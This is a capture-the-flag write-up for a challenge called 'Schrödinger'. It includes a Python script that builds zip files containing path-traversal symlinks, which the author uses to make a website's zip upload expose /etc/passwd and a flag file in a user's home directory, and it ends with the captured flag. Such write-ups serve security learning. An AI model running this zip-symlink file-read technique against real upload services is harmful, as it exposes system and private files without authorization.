Schrödinger

266

Instructions

Hey, my digital cat managed to get into my server and I can’t get him out.

The only thing running on the server is a website a colleague of mine made.

Can you find a way to use the website to check if my cat’s okay? He’ll likely be in the user’s home directory.

You’ll know he’s fine if you find a “flag.txt” file.

By helix (@helix_shift on discord)

Solution

I wrote a quick Python script to generate zip files with symlinks to a target file.

#!/usr/bin/env python3

import zipfile
from sys import argv

def zi(num):
    zipInfo = zipfile.ZipInfo()
    zipInfo.create_system = 3
    zipInfo.external_attr = 2716663808
    zipInfo.filename = f"/flag{num}"
    return zipInfo

def pi(num, path):
    x = ['..']*num
    dots = '/'.join(x)
    return dots + path

if len(argv) != 2:
    print("usage: ./solve.py <path>")
    exit(1)

target_fs_path = argv[1]

with zipfile.ZipFile('payload.zip', 'w') as zipf:
    for n in range(0, 10):
        zipInfo = zi(n)
        path = pi(n, target_fs_path)
        zipf.writestr(zipInfo, path)

The challenge indicates that the file will be in a home directory, but symlinks don’t follow ~/flag.txt or $HOME/flag.txt to the user’s home directory. So instead, I read /etc/passwd to figure out which user home directory we needed to target.

/home/copenhagen/flag.txt is the obvious target. Just generate another zip with a symlink to this path.

utflag{No_Observable_Cats_Were_Harmed}